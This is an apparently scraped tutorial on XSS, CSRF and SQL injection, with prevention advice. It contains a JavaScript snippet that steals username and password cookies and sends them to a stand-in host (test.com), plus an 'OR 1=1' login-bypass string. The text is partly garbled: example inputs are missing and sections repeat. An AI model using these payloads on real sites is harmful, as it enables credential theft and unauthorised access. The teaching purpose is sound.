XSS attack principle
Xss (cross-site scripting) attacks refer to attackers inserting malicious html tags or javascript code into web pages.
For example:
①The attacker places a seemingly safe link in the forum, deceives the user into clicking on it, and then steals the user’s private information in the cookie;
② Or the attacker adds a malicious form to the forum, and when the user submits the form, the information is sent to the attacker’s server instead of the site that the user originally thought they trusted.
Allow users to leave comments as follows
Because we completely trust user input, but some users with ulterior motives will input like this
In this way, no matter who visits this page, the console will output “Hey you are a fool fish!”. If this is just a malicious little joke, some people will do things that are not cute, and some users will use this vulnerability to steal users. information, tricking people into opening malicious websites or downloading malicious programs, etc. Let’s take a look at the simplest example.
Use xss to steal username and password
Of course, this example is very simple and can hardly attack any website. Just look at the principle. We know that many login interfaces have the function of remembering usernames and passwords to facilitate users to log in next time. Some websites directly record usernames and passwords in plain text. After a malicious user registers an account and logs in, use a simple tool to view the cookie structure name. If the website If there is an XSS vulnerability, you can simply use jsonp to obtain the username and password of other users.
A malicious user would enter this
Let’s take a look at what’s hidden in http://test.com/hack.js
<pre style="margin: 0px; white-space: pre-wrap; overflow-wrap: break-word; padding: 0px; list-style-type: none; list-style-image: none; font- family: & amp;quot;Courier New & amp;quot; !important; font-size: 12px !important;">
var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username=' + username + ' & amp;password=' + password;
document.body.appendChild(script);
A few simple javascripts to get the username and password in the cookie, and use jsonp to redirect to http://test.com/index.php
Hazards:
1. Steal user information, such as machine login accounts, user online banking accounts, and various administrator accounts
2. Control corporate data, including the ability to read, tamper with, add, and delete corporate sensitive data
3. Stealing important company information with commercial value
4. Illegal transfer
5. Force sending emails
7. Control the victim’s machine to launch attacks on other websites
XSS attack prevention methods
First of all, the code needs to carefully check the length of user input places and variables and filter characters such as “<", ">“, “;”, “‘”;
Secondly, any content must be encoded before being written to the page to avoid accidentally removing the html tag. If this level is done well, at least more than half of XSS attacks can be blocked.First, avoid disclosing user privacy directly in cookies, such as email, password, etc.
Secondly, reduce the risk of cookie leakage by binding the cookie to the system IP. The cookie obtained by the attacker has no actual value and cannot be replayed.
Try to use POST instead of GET to submit the form
The difference between XSS attacks and CSRF attacks (cross-site request forgery)
XSS is to obtain information, and there is no need to know the codes and data packets of other user pages in advance. CSRF is to complete specified actions on behalf of the user and needs to know the codes and data packets of other user pages.
To complete a CSRF attack, the victim must complete two steps in sequence:
Log in to trusted website A and generate cookies locally.
Access dangerous website B without logging out of A.
CSRF attack
Principle:
CSRF (Cross Site Request Forgery), cross-site request forgery, is a common web attack. The victim user of the CSRF attack process logs into website A, enters personal information, and saves the cookie generated by the server locally. Then click on a malicious link built by the attacker on website A to jump to website B, and then website B carries the user cookie information to visit website B. Let website A create the illusion that the user has visited it himself, so as to perform a series of operations, a common one is transfer.
Example:
1. A website user Bob may be browsing a chat forum, while another user Alice is also in this forum, and the latter has just posted a picture message with a link to Bob’s bank. Imagine that Alice writes a link to submit a form for withdrawing money on Bob’s bank site and uses this link as the image src. If Bob’s bank saves his authorization information in a cookie, and this cookie has not expired, then Bob’s browser will submit the withdrawal form and his cookie when trying to load the image, thus authorizing without Bob’s consent. this incident.
Hazards:
A web application that performs certain actions based on a trusted input form and an authenticated user that does not require authorization for specific actions. A user who has been authenticated through a cookie stored in the user’s browser will send an HTTP request to a site that trusts him in complete ignorance, and then perform actions that the user does not want to do.
Prevention:
1. Verification code.
During the interaction between the application and the user, especially in core steps such as account transactions, the user is forced to enter a verification code to complete the final request. Under normal circumstances, captchas are good enough to contain
CSRF attack. However, adding verification codes reduces the user experience, and the website cannot add verification codes to all operations. Therefore, verification codes can only be used as an auxiliary means to set verification codes at key business points.
2. Anti CSRF Token.
The current relatively complete solution is to add Anti-CSRF-Token, that is, when sending a request, in the HTTP request
Add a randomly generated token as a parameter to the request, and create an interceptor on the server to verify the token. The server reads the token value in the browser’s current domain cookie and verifies the token in the request.
Only if the token values in the cookie and the cookie exist and are equal will it be considered a legitimate request.
CSRF Defense
There are many ways to implement CSRF on the server side, but the general idea is the same, which is to add pseudo-random numbers to the client page.
How to pass verification code
SQL injection attack
Principle:
SQL injection (SQL Injection), when the application transfers SQL (Structured Query Language, Structured Query Language) to the backend database, the attacker inserts SQL commands into the Web form to submit or enters the query string of the domain name or page request, and finally achieves Trick the server into executing malicious SQL commands.
Example:
The SQL query code for login verification of a website is:
strSQL = “SELECT * FROM users WHERE (name = ‘” + userName + “‘) and (pw = ‘” + passWord + “‘);”
Fill in maliciously
userName = “1′ OR ‘1’=’1”;
and
passWord = “1′ OR ‘1’=’1”;
will cause the original SQL string to be filled in as
strSQL = “SELECT * FROM users WHERE (name = ‘1’ OR ‘1’=’1′) and (pw = ‘1’ OR ‘1’=’1′);”
That is to say, the SQL command actually run will become as follows
strSQL = “”SELECT * FROM users;”
Therefore, you can log in to the website without an account or password. Therefore, SQL injection attacks are commonly known as hackers’ fill-in-the-blank game.
Hazards:
Get administrator rights
Prevention:
1. Add blacklist or whitelist verification
Whitelist validation generally refers to checking whether user input conforms to the expected type, length, value range, or other format standards. Blacklist verification means that if the user input contains obvious malicious content, the user request will be rejected. When using whitelist verification, it is generally combined with blacklist verification.
2. Safety detection
When the project is completed, safety inspections are always adhered to.
3. Prevent the leakage of sensitive system information
Strictly control access rights to data tables and try to limit unnecessary user access rights.
Summary:
SQL injection principle
By inserting SQL commands into Web form submissions or entering domain names or query strings for page requests, it ultimately deceives the server into executing malicious SQL commands.
SQL injection prevention
1. Never trust the user’s input. To verify the user’s input, you can use regular expressions, or limit the length, convert single quotes and double “-“, etc.
2. Never use dynamic assembly of SQL. You can use parameterized SQL or directly use stored procedures for data query and access.
3. Never use a database connection with administrator privileges. Use a separate database connection with limited privileges for each application.
4. Do not store confidential information in plain text. Please encrypt or hash passwords and sensitive information.
XSS
Xss (cross-site scripting) attacks refer to attackers inserting malicious html tags or javascript code into web pages.
xss prevention
First of all, the code needs to carefully check the length of user input places and variables and filter characters such as “<", ">“, “;”, “‘”;
Secondly, any content must be encoded before being written to the page to avoid accidentally removing the html tag. If this level is done well, at least more than half of XSS attacks can be blocked.First, avoid disclosing user privacy directly in cookies, such as email, password, etc.
Secondly, reduce the risk of cookie leakage by binding the cookie to the system IP. The cookie obtained by the attacker has no actual value and cannot be replayed.
Try to use POST instead of GET to submit the form
CSRF
CSRF(Cross Site Request
Forgery), cross-site request forgery, is a common web attack. The victim user of the CSRF attack process logs into website A, enters personal information, and saves the cookie generated by the server locally. Then click on a malicious link built by the attacker on website A to jump to website B, and then website B carries the user cookie information to visit website B.
CSRF Defense
There are many ways to implement CSRF on the server side, but the general idea is the same, which is to add pseudo-random numbers to the client page.
How to pass verification code
The knowledge points of the article match the official knowledge files, and you can further learn relevant knowledge. MySQL entry skill treeSQL advanced skillsCTE and recursive query 75611 people are learning the system